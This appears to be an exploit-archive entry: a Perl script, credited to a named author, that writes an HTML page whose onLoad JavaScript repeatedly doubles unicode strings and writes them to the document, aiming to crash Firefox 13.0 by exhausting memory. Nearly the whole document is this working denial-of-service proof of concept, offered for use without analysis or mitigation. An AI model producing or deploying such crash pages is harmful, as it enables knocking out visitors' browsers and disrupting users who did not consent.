Mozilla Firefox version 13.0 remote denial of service proof of concept exploit.
ae7f511ae4c9e3d17f34eb4e61e113606abd673ebae4661615339b1341be665c
#!/usr/bin/perl
# Mozilla Firefox Web Browser 13.0 Remote Denial-of-service Exploit Proof
of Concept
# Author: Ucha Gobejishvili
use Term::ANSIColor qw(:constants);
open FH, ">poc.html";
print FH "<html>
<title>Hello World!</title>
<head>
<script>
function boom()
{
var longunistring1 = unescape('%u4141%u4141');
var longunistring2 = unescape('%u4242%u4242');
var longunistring3 = unescape('%u4343%u4343');
var longunistring4 = unescape('%u4444%u4444');
for(i=0; i <= 60 ; ++i)
{
longunistring1+=longunistring1;
longunistring2+=longunistring2;
longunistring3+=longunistring3;
longunistring4+=longunistring4;
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
}
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
}
</script>
</head>
<body onLoad='boom()'>
<H1> Working! </h1>
</body>
</html> \n";
close FH;
print RED, "POC Created.";
print " \n";
exit;